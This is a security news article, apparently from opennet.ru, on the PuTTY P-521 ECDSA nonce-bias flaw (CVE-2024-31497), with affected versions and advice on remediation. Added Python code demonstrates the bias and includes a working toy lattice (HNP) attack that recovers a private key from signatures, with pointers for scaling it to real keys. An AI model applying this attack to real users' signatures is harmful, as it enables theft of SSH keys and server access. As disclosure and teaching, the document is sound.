Vulnerability in PuTTY allows recovery of a user's private key

A dangerous vulnerability (CVE-2024-31497) has been identified in PuTTY, an SSH client widely used on the Windows platform, that allows recovery of a user's private key of the NIST P-521 elliptic-curve ECDSA type (ecdsa-sha2-nistp521). To disclose the private key, it is enough to analyze roughly sixty digital signatures produced with the affected key.

The vulnerability has been present since PuTTY 0.68 and also affects products that bundle vulnerable versions of PuTTY, for example FileZilla (3.24.1 - 3.66.5), WinSCP (5.9.5 - 6.3.2), TortoiseGit (2.4.0.2 - 2.15.0) and TortoiseSVN (1.10.0 - 1.14.6). The problem is fixed in PuTTY 0.81, FileZilla 3.67.0, WinSCP 6.3.3 and TortoiseGit 2.15.0.1. Updating alone is not enough: any ecdsa-sha2-nistp521 key that has ever been used for signing with a vulnerable version should be treated as compromised, because signatures an attacker has already collected remain usable. After installing the update, users are advised to generate new keys and remove the old public keys from their authorized_keys files.

The vulnerability stems from carelessness on the developers' part. The per-signature nonce (the value k in ECDSA, loosely called an initialization vector in some descriptions) was derived from a 512-bit value, a SHA-512 digest, and then reduced modulo the group order. That is harmless for curves whose order is at most 384 bits, but the order of P-521 is 521 bits long, so the reduction changes nothing and the nonce is simply the 512-bit digest. The developers evidently assumed that 512 bits of entropy would be sufficient and that the remaining 9 bits did not matter. As a result, in every signature PuTTY produced with an ecdsa-sha2-nistp521 key, the top 9 bits of the nonce were always zero.
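To make the defect concrete, the following is an added example written for this page; it is not PuTTY's code. It models the pre-0.81 derivation as one SHA-512 digest of (private scalar, message hash) reduced modulo the group order q (the exact bytes PuTTY hashed are not reproduced, only the 512-bits-then-mod-q structure, which is an assumption of the model), measures how many top bits of the resulting nonce are zero for P-256 and P-521, and contrasts it with an illustrative wide-hash derivation (not PuTTY's actual fix, which was to adopt RFC 6979). The group orders are the FIPS 186-4 constants; the private scalar and message hashes are constructed random bytes.

```python
"""Why a 512-bit hash reduced mod the P-521 order leaves 9 known zero bits."""
import hashlib
import os

# Group orders q of two NIST curves (FIPS 186-4); only the modulus is needed here.
Q_P256 = 0xFFFFFFFF00000000FFFFFFFFFFFFFFFFBCE6FAADA7179E84F3B9CAC2FC632551
Q_P521 = int("01FF" + "FFFFFFFF" * 7 + "FFFFFFFA"
             + "51868783BF2F966B7FCC0148F709A5D03BB5C9B8899C47AEBB6FB71E91386409", 16)


def flawed_nonce(priv: bytes, msg_hash: bytes, q: int) -> int:
    """Simplified model (assumption) of the pre-0.81 PuTTY scheme: one SHA-512
    digest reduced mod q. The exact byte layout PuTTY hashed is not reproduced;
    the 512-bits-then-mod-q structure is what matters."""
    h = int.from_bytes(hashlib.sha512(priv + msg_hash).digest(), "big")
    return h % q          # if q > 2^512 the reduction does nothing and k = h < 2^512


def wide_nonce(priv: bytes, msg_hash: bytes, q: int) -> int:
    """Illustrative repair, not PuTTY's actual fix (0.81 switched to RFC 6979):
    produce at least 64 bits more than q needs before reducing, so the modular
    bias is negligible for every curve size."""
    blocks = (q.bit_length() + 64 + 511) // 512
    buf = b"".join(hashlib.sha512(priv + msg_hash + bytes([i])).digest()
                   for i in range(blocks))
    return int.from_bytes(buf, "big") % q


def leading_zero_bits(k: int, q: int) -> int:
    """Number of zero bits at the top of k when written with q.bit_length() bits."""
    return q.bit_length() - k.bit_length()


def min_leading_zeros(derive, q: int, trials: int = 200) -> int:
    """Smallest leading-zero count over many signatures under one key. A positive
    minimum means every nonce shares that many attacker-known zero bits."""
    priv = os.urandom(66)                     # constructed stand-in for the private scalar
    return min(leading_zero_bits(derive(priv, os.urandom(32), q), q)
               for _ in range(trials))


if __name__ == "__main__":
    for name, q in (("P-256", Q_P256), ("P-521", Q_P521)):
        print(f"{name}: flawed={min_leading_zeros(flawed_nonce, q)} "
              f"wide={min_leading_zeros(wide_nonce, q)} known zero bits")
```

For P-256 the flawed derivation shows no fixed zero bits (a 512-bit value reduced mod a 256-bit order is essentially uniform), while for P-521 every nonce has exactly 9 known zero bits; the wide derivation removes the bias for both.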

For ECDSA and DSA, both the quality of the random number generator and the requirement that the nonce cover the full range of the group order used in the modular arithmetic are critical: if even a few bits of each nonce are known, an attack becomes possible that progressively recovers the whole private key from accumulated signatures. To recover the key, it suffices to know the public key and to analyze a number of signatures made with the affected key over data known to the attacker. The attack reduces to solving the Hidden Number Problem (HNP), in practice via lattice reduction.
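The HNP reduction just described, as an added self-contained example (not PuTTY's code and not the researchers' attack code). It uses constructed toy parameters so that a pure-Python LLL finishes quickly: a 31-bit prime group order (2^31 - 1) in place of P-521's 521-bit order, nonces whose top 9 bits are zero exactly as in the real bug, and random r values standing in for x(kG) mod q, since the HNP step only uses the (r, s, h) algebra and never the curve arithmetic. From s = k^-1 (h + r d) mod q each signature gives k_i = t_i d + u_i (mod q) with t_i = r_i / s_i and u_i = h_i / s_i; eliminating d through the first signature turns the small nonces into a short vector in a lattice that LLL finds. Twelve signatures suffice here because 9 leaked bits per signature quickly exceed 31 bits of secret; at 521 bits the same arithmetic needs about sixty, as the text states.

```python
"""Toy HNP key recovery from ECDSA-style signatures whose nonces have 9 zero top bits."""
import random
from fractions import Fraction

# Constructed toy parameters: a 31-bit prime group order and nonces with the top
# 9 bits zero, the same 9-bit defect PuTTY had at 521 bits. Small numbers keep
# the pure-Python LLL below fast; the algebra is identical at full size.
Q = (1 << 31) - 1                                 # 2^31 - 1, a Mersenne prime
BIAS_BITS = 9
K_BOUND = 1 << (Q.bit_length() - BIAS_BITS)       # every nonce k satisfies 0 < k < K_BOUND


def sign_biased(d: int, h: int, rng: random.Random):
    """ECDSA signing equation s = k^-1 (h + r*d) mod Q with a biased nonce.
    r stands in for x(kG) mod Q and is drawn at random here (assumption): the
    HNP step only uses the (r, s, h) algebra, never the curve arithmetic."""
    while True:
        k = rng.randrange(1, K_BOUND)             # top BIAS_BITS bits are zero
        r = rng.randrange(1, Q)
        s = pow(k, -1, Q) * (h + r * d) % Q
        if s:
            return r, s


def lll(basis, delta=Fraction(3, 4)):
    """Textbook LLL reduction with exact rational Gram-Schmidt (fine for ~15 dims)."""
    B = [list(row) for row in basis]
    n = len(B)

    def dot(x, y):
        return sum(p * q for p, q in zip(x, y))

    def gram_schmidt():
        star, mu = [], [[Fraction(0)] * n for _ in range(n)]
        for i in range(n):
            v = [Fraction(x) for x in B[i]]
            for j in range(i):
                mu[i][j] = dot(B[i], star[j]) / dot(star[j], star[j])
                v = [p - mu[i][j] * q for p, q in zip(v, star[j])]
            star.append(v)
        return star, mu

    star, mu = gram_schmidt()
    k = 1
    while k < n:
        for j in range(k - 1, -1, -1):            # size-reduce b_k by b_j
            c = round(mu[k][j])
            if c:
                B[k] = [p - c * q for p, q in zip(B[k], B[j])]
                for i in range(j):
                    mu[k][i] -= c * mu[j][i]
                mu[k][j] -= c
        if dot(star[k], star[k]) >= (delta - mu[k][k - 1] ** 2) * dot(star[k - 1], star[k - 1]):
            k += 1                                # Lovasz condition holds
        else:
            B[k - 1], B[k] = B[k], B[k - 1]       # swap and recompute the projections
            star, mu = gram_schmidt()
            k = max(k - 1, 1)
    return B


def recover_key(sigs, hashes):
    """Reduce (r, s, h) triples to an HNP instance and solve it with LLL."""
    m = len(sigs)
    t = [r * pow(s, -1, Q) % Q for r, s in sigs]                 # k_i = t_i*d + u_i (mod Q)
    u = [h * pow(s, -1, Q) % Q for (r, s), h in zip(sigs, hashes)]
    # Eliminate d via signature 0: k_i = a_i*k_0 + b_i (mod Q), with every k small.
    inv_t0 = pow(t[0], -1, Q)
    a = [ti * inv_t0 % Q for ti in t[1:]]
    b = [(ui - ai * u[0]) % Q for ai, ui in zip(a, u[1:])]
    n = m + 1                                     # coordinates: k_1..k_{m-1}, k_0, constant
    basis = [[Q if j == i else 0 for j in range(n)] for i in range(m - 1)]  # absorb mod-Q wraps
    basis.append(a + [1, 0])                      # scaled by the unknown small k_0
    basis.append(b + [0, K_BOUND])                # taken exactly once; tags the target vector
    for row in lll(basis):                        # target is (k_1, ..., k_{m-1}, k_0, K_BOUND)
        if abs(row[-1]) != K_BOUND:
            continue
        k0 = row[-2] if row[-1] > 0 else -row[-2]
        d = (k0 - u[0]) * inv_t0 % Q
        if all((ti * d + ui) % Q < K_BOUND for ti, ui in zip(t, u)):
            return d                              # every implied nonce respects the bias
    return None


def demo(seed: int = 7, num_sigs: int = 12):
    """Generate a key, collect biased signatures over constructed hashes, attack."""
    rng = random.Random(seed)
    d = rng.randrange(1, Q)
    hashes = [rng.randrange(1, Q) for _ in range(num_sigs)]
    sigs = [sign_biased(d, h, rng) for h in hashes]
    return d, recover_key(sigs, hashes)


if __name__ == "__main__":
    secret, recovered = demo()
    print(f"secret d = {secret}, recovered d = {recovered}")
```

The attacker never needs the private key material itself: the public key, the signed data and the signatures are enough, and the recovered d can be confirmed against the public key in a real deployment. Scaling to P-521 replaces the toy order with the real 521-bit one, the 22-bit nonce bound with 2^512 and the pure-Python LLL with a proper lattice library.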

The required signatures can be obtained, for example, when the user connects to an SSH server controlled by the attacker, or to a Git server that uses SSH as its transport. Signatures usable for the attack can also be collected where the key was used to sign unrelated data, for example git commits signed through the Pageant SSH agent, or signatures made through an agent connection forwarded to a host under the attacker's control. Obtaining the data needed for key recovery by a MITM attack is not possible, because SSH signatures are carried inside the already encrypted channel and are never transmitted in cleartext.

It is noted that PuTTY applied the same too-narrow nonce derivation to the other elliptic curves as well, but for algorithms other than ECDSA P-521 the resulting information leak is far too small for a key-recovery attack: reducing a 512-bit value modulo a 256- or 384-bit order leaves only a negligible bias. ECDSA keys of other sizes and Ed25519 keys are not affected.

Source: opennet.ru
